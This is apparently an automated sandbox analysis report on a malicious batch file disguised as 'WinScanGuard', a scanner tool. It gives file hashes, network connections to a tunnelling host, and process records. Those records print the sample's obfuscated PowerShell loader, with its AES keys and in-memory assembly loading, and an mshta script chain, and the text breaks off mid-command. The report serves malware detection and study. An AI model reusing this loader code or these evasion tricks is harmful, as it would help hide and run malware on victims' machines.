SHA-512: 33B63EBADB890E640FE07095F8C5976BF5CDF84D5197787DE585C718CDA3208A48B046A3BCE2039F6AEFCF3900E7F172E124543AD4EC835E5BD900FDAAE4EB91
Malicious: false
Preview: @...e...................................'............@..........

Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):452608
                                                                                                                  Entropy (8bit):5.459268466661775
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                                  MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                                  SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                                  SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: Shadow-Stealer.bat, Detection: malicious, Browse
                                                                                                                  • Filename: trafik_yenilme.bat, Detection: malicious, Browse
                                                                                                                  • Filename: a.bat, Detection: malicious, Browse
                                                                                                                  • Filename: Rune_Launcher.bat, Detection: malicious, Browse
                                                                                                                  • Filename: SCO_23.bat, Detection: malicious, Browse
                                                                                                                  • Filename: IMG_690B23.docx.bat, Detection: malicious, Browse
                                                                                                                  • Filename: Qtagiietkyb.png.bat, Detection: malicious, Browse
• Filename: IMG_690B23.bat, Detection: malicious
• Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious
• Filename: 345d.cmd, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: PingOptimizerMain.bat, Detection: malicious
• Filename: crack.bat, Detection: malicious
• Filename: da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.bat, Detection: malicious
• Filename: Final_rooming_list.bat, Detection: malicious
• Filename: RE_432-7784.js, Detection: malicious
• Filename: FA150623.pdf.bat, Detection: malicious
• Filename: Uni.bat, Detection: malicious
Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 289792
Entropy (8bit): 6.135598950357573
Encrypted: false
SSDEEP: 6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1: F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256: B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512: 99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 14848
Entropy (8bit): 4.477514759495553
Encrypted: false
SSDEEP: 192:Mp2bLg8CB95kCfjmRXKbpkSprJ6AdgxYsPvWw5aIR:MpMLgdrkCjm9KZJAXWw5
MD5: 0B4340ED812DC82CE636C00FA5C9BEF2
SHA1: 51C97EBE601EF079B16BCD87AF827B0BE5283D96
SHA-256: DBA3137811C686FD35E418D76184070E031F207002649DA95385DFD05A8BB895
SHA-512: D9DF8C1F093EA0F7BDE9C356349B2BA43E3CA04B4C87C0F33AB89DDA5AFE9966313A09B60720AA22A1A25D43D7C71A060AF93FB8F6488201A0E301C83FA18045
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Process: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 452608
Entropy (8bit): 5.459268466661775
Encrypted: false
SSDEEP: 6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
MD5: 04029E121A0CFA5991749937DD22A1D9
SHA1: F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
SHA-256: 9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
SHA-512: 6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.466230233222637
Encrypted: false
SSDEEP: 6144:2IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNIdwBCswSb3:7XD94+WlLZMM6YFHC+3
MD5: E0CD6C1413187D844B701EBB6AAAD40E
SHA1: 978C74EEEC15F6503A9474973E2E1BA166E1589F
SHA-256: D8B3F8F2DB986858DBA6C68B9D283B8D9AD1C6A132BC91331550D9D285625695
SHA-512: B23AA18E770612D2E5E68D324C0362AEB05A901937C54A9231B112CAB98E63EC1E3E5084200EA04DCE090D39D2939DDD555713DD7D3CD7805FFE3F0A284359FC
Malicious: false
File type: ASCII text, with very long lines (4949), with CRLF line terminators
Entropy (8bit): 6.034933568775613
TrID:
File name: WinScanGuard_v.2.1.bat
File size: 13'030'371 bytes
MD5: 1837a5f032a42228c0854fb83a8d12c8
SHA1: de434e8479dfbc102ac30428b69199009973d788
SHA256: 13291c07421049ba4d39f521c3ae17923180ac5186d87952709c1fa775e39dd4
SHA512: 622431f44f0359bcc0cbe0bc4cf51dba6d6bb1b8ce3b2cf575ad4ddc256d19f62686df87d8a26a761c3aefd920e5dfd399e28008e12296808aa7970562402470
SSDEEP: 49152:uIKfaP4T0T7fSQYUwnEgLO3Grqx8MS/oGadv7tA5TPHFe7yq+Bg/KjyCy1HdnpGj:Y
TLSH: E0D6CFCBA3E9700AB8DA1741C0C5D5A5E15000845D9781FB9EF0B396999F8BBD87BC3B
Icon Hash: 9686878b929a9886

TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2023 16:55:43.520767927 CET | 49736 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:55:43.850575924 CET | 22112 | 49736 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:55:43.850892067 CET | 49736 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:55:44.227205992 CET | 49736 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:55:44.574769020 CET | 22112 | 49736 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:55:47.649981976 CET | 22112 | 49736 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:55:49.322227955 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:55:49.581300974 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:55:49.581397057 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:55:49.582201958 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:55:49.838464022 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:56:04.880826950 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:56:04.880949974 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:56:14.840202093 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:56:15.099138021 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:56:30.128767967 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:56:30.128885984 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:56:40.108650923 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:56:40.383013964 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:56:55.408804893 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:56:55.408994913 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:57:05.481062889 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:57:05.745306969 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:57:20.784871101 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:57:20.785048962 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:57:30.746467113 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116
Dec 3, 2023 16:57:31.006043911 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:57:46.032910109 CET | 22112 | 49737 | 167.71.56.116 | 192.168.2.4
Dec 3, 2023 16:57:46.032975912 CET | 49737 | 22112 | 192.168.2.4 | 167.71.56.116

UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2023 16:55:43.338063002 CET | 59651 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2023 16:55:43.500899076 CET | 53 | 59651 | 1.1.1.1 | 192.168.2.4

DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2023 16:55:43.338063002 CET | 192.168.2.4 | 1.1.1.1 | 0xe5ed | Standard query (0) | throbbing-mountain-09011.pktriot.net | A (IP address) | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2023 16:55:43.500899076 CET | 1.1.1.1 | 192.168.2.4 | 0xe5ed | No error (0) | throbbing-mountain-09011.pktriot.net | eu-central-7075.packetriot.net | (none) | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2023 16:55:43.500899076 CET | 1.1.1.1 | 192.168.2.4 | 0xe5ed | No error (0) | eu-central-7075.packetriot.net | (none) | 167.71.56.116 | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 16:55:02
Start date: 03/12/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" "
Imagebase: 0x7ff7c3030000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 16:55:02
Start date: 03/12/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                    Target ID:2
                                                                                                                    Start time:16:55:10
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                    Imagebase:0x7ff60eaa0000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:16:55:25
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:16:55:25
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:10
                                                                                                                    Start time:16:55:25
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144
                                                                                                                    Imagebase:0xf20000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:13
                                                                                                                    Start time:16:55:30
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                                                                                                    Imagebase:0x7ff7142f0000
                                                                                                                    File size:14'848 bytes
                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:14
                                                                                                                    Start time:16:55:30
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:15
                                                                                                                    Start time:16:55:30
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:16
                                                                                                                    Start time:16:55:31
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%
                                                                                                                    Imagebase:0x7ff6154f0000
                                                                                                                    File size:289'792 bytes
                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:17
                                                                                                                    Start time:16:55:31
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:18
                                                                                                                    Start time:16:55:31
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = 
